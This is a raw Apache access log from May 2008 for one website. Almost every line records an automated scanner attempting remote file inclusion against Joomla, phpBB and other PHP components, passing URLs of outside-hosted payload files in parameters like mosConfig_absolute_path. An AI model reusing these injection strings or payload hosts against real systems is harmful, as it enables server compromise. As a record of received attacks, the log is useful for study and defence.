67.19.51.194 - - [03/May/2008:09:17:47 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:09:18:05 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:09:18:06 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:09:18:06 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.102.21.200 - - [03/May/2008:09:18:07 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:09:18:18 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:09:18:18 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:09:18:18 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.70.45 - - [03/May/2008:09:18:27 -0700] "GET /logs/display.php?table=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.219.101.32 - - [03/May/2008:09:18:32 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.220.202.24 - - [03/May/2008:09:18:32 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.219.101.32 - - [03/May/2008:09:18:32 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.70.45 - - [03/May/2008:09:18:32 -0700] "GET /display.php?table=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.219.101.32 - - [03/May/2008:09:18:32 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.101.32 - - [03/May/2008:09:18:32 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.101.32 - - [03/May/2008:09:18:33 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.101.32 - - [03/May/2008:09:18:33 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:18:34 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.los-chamos.com/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:18:38 -0700] "GET //index.php?option=com_custompages&cpage=http://www.los-chamos.com/id2.txt? HTTP/1.0" 200 11590 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:18:38 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.los-chamos.com/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
62.75.158.23 - - [03/May/2008:09:18:47 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:18:47 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.los-chamos.com/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
62.75.158.23 - - [03/May/2008:09:18:47 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [03/May/2008:09:18:48 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:18:52 -0700] "GET //index.php?option=com_custompages&cpage=http://www.los-chamos.com/id2.txt? HTTP/1.0" 200 11590 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:18:53 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.los-chamos.com/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
62.75.158.23 - - [03/May/2008:09:18:57 -0700] "GET /logs/access_080312.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:19:08 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.los-chamos.com/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:19:12 -0700] "GET //index.php?option=com_custompages&cpage=http://www.los-chamos.com/id2.txt? HTTP/1.0" 200 11590 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:19:12 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.los-chamos.com/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
213.218.137.36 - - [03/May/2008:09:19:27 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.200.164 - - [03/May/2008:09:19:38 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.218.137.36 - - [03/May/2008:09:19:40 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.218.137.36 - - [03/May/2008:09:19:41 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.108.81.101 - - [03/May/2008:09:19:47 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.108.81.101 - - [03/May/2008:09:19:48 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.108.81.101 - - [03/May/2008:09:19:48 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.6.34 - - [03/May/2008:09:19:49 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://walasri.com/data/menu/file/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.6.34 - - [03/May/2008:09:19:49 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://walasri.com/data/menu/file/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.6.34 - - [03/May/2008:09:19:49 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://walasri.com/data/menu/file/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.192.70.11 - - [03/May/2008:09:20:01 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
67.19.51.194 - - [03/May/2008:09:20:09 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [03/May/2008:09:20:09 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.40 - - [03/May/2008:09:20:12 -0700] "GET /logs/access_080428.log HTTP/1.1" 200 1245184 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
212.113.24.154 - - [03/May/2008:09:20:25 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [03/May/2008:09:20:25 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [03/May/2008:09:20:25 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
65.55.211.39 - - [03/May/2008:09:20:25 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.39 - - [03/May/2008:09:20:27 -0700] "GET /logs/access_080425.log HTTP/1.1" 200 1245184 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.39 - - [03/May/2008:09:20:29 -0700] "GET /logs/?N=A HTTP/1.1" 200 45840 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
75.102.21.200 - - [03/May/2008:09:20:29 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.102.21.200 - - [03/May/2008:09:20:29 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.195.49.105 - - [03/May/2008:09:20:47 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://walasri.com/data/menu/file/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.195.49.105 - - [03/May/2008:09:20:47 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://walasri.com/data/menu/file/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.195.49.105 - - [03/May/2008:09:20:47 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://walasri.com/data/menu/file/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [03/May/2008:09:21:21 -0700] "GET /logs/access_080321.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [03/May/2008:09:21:25 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [03/May/2008:09:21:26 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.74.183.50 - - [03/May/2008:09:21:43 -0700] "GET /logs/access_071229.log/side.php?table=http://www.elnavegantedigital.es/components/pay/1983?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.74.183.50 - - [03/May/2008:09:21:43 -0700] "GET /logs/side.php?table=http://www.elnavegantedigital.es/components/pay/1983?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.220.202.24 - - [03/May/2008:09:21:55 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.220.202.24 - - [03/May/2008:09:21:55 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.74.37.170 - - [03/May/2008:09:21:55 -0700] "GET /index2.php?inject%20http://rootshell.altervista.org/r0x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
195.74.37.170 - - [03/May/2008:09:21:59 -0700] "GET /logs/index2.php?inject%20http://rootshell.altervista.org/r0x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
213.246.51.45 - - [03/May/2008:09:22:32 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [03/May/2008:09:22:32 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.158.23 - - [03/May/2008:09:22:46 -0700] "GET /logs/access_080227.log//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [03/May/2008:09:22:46 -0700] "GET //sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [03/May/2008:09:22:46 -0700] "GET /logs//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
65.55.211.21 - - [03/May/2008:09:22:47 -0700] "GET /logs/access_080418.log HTTP/1.1" 200 1245184 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
216.227.217.6 - - [03/May/2008:09:22:55 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.217.6 - - [03/May/2008:09:22:55 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.158.23 - - [03/May/2008:09:22:57 -0700] "GET /logs/access_080117.log//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
89.218.85.18 - - [03/May/2008:09:22:58 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [03/May/2008:09:22:59 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.19.130 - - [03/May/2008:09:22:59 -0700] "GET /logs/index.php?configFile=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [03/May/2008:09:23:03 -0700] "GET /index.php?configFile=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.6.34 - - [03/May/2008:09:24:04 -0700] "GET /logs/access_080308.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://walasri.com/data/menu/file/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.6.34 - - [03/May/2008:09:24:08 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://walasri.com/data/menu/file/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.108.81.101 - - [03/May/2008:09:24:13 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.108.81.101 - - [03/May/2008:09:24:13 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.108.81.101 - - [03/May/2008:09:24:14 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.113.24.154 - - [03/May/2008:09:24:14 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [03/May/2008:09:24:15 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
78.108.81.101 - - [03/May/2008:09:24:21 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.12.151.34 - - [03/May/2008:09:24:35 -0700] "GET /logs/access_080218.log/convert/mvcw.php?step=1&vwar_root=http://216.120.252.101/~beogor/news/31337.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.12.151.34 - - [03/May/2008:09:25:07 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://216.120.252.101/~beogor/news/31337.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.12.151.34 - - [03/May/2008:09:25:08 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://216.120.252.101/~beogor/news/31337.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.12.151.34 - - [03/May/2008:09:25:08 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://216.120.252.101/~beogor/news/31337.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
216.195.49.105 - - [03/May/2008:09:25:23 -0700] "GET /logs/access_080308.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://walasri.com/data/menu/file/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.134.252.194 - - [03/May/2008:09:26:22 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://walasri.com/data/menu/file/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
205.134.252.194 - - [03/May/2008:09:26:22 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://walasri.com/data/menu/file/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
205.134.252.194 - - [03/May/2008:09:26:22 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://walasri.com/data/menu/file/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.195.49.105 - - [03/May/2008:09:26:31 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://walasri.com/data/menu/file/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.108.81.101 - - [03/May/2008:09:26:40 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.108.81.101 - - [03/May/2008:09:26:41 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.98.95.186 - - [03/May/2008:09:26:52 -0700] "GET /logs/access_080227.log//include.php?path[docroot]=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.231.1.90 - - [03/May/2008:09:27:08 -0700] "GET /logs/index.php?site=http://www.freewebs.com/haddem/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
80.231.1.90 - - [03/May/2008:09:27:14 -0700] "GET /index.php?site=http://www.freewebs.com/haddem/test.txt?? HTTP/1.1" 200 11606 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
74.53.84.2 - - [03/May/2008:09:27:19 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.75.158.23 - - [03/May/2008:09:28:03 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [03/May/2008:09:28:03 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
74.53.84.2 - - [03/May/2008:09:28:09 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:09:28:11 -0700] "GET /logs/access_080227.log//include.php?path[docroot]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.113.24.154 - - [03/May/2008:09:28:24 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
82.192.70.11 - - [03/May/2008:09:28:44 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
82.192.70.11 - - [03/May/2008:09:28:44 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
64.38.19.130 - - [03/May/2008:09:29:25 -0700] "GET /logs/access.log/index.php?configFile=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.12.151.34 - - [03/May/2008:09:29:32 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://216.120.252.101/~beogor/news/31337.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.38.19.130 - - [03/May/2008:09:29:41 -0700] "GET /logs/access_080213.log/index.php?configFile=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.25.230.39 - - [03/May/2008:09:29:42 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.olgunlar.com/mambots/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.73.146.54 - - [03/May/2008:09:29:47 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [03/May/2008:09:29:47 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [03/May/2008:09:29:47 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [03/May/2008:09:29:47 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [03/May/2008:09:29:47 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.146.54 - - [03/May/2008:09:29:47 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.70.45 - - [03/May/2008:09:30:12 -0700] "GET /logs/display.php?table=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.70.45 - - [03/May/2008:09:30:12 -0700] "GET /display.php?table=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
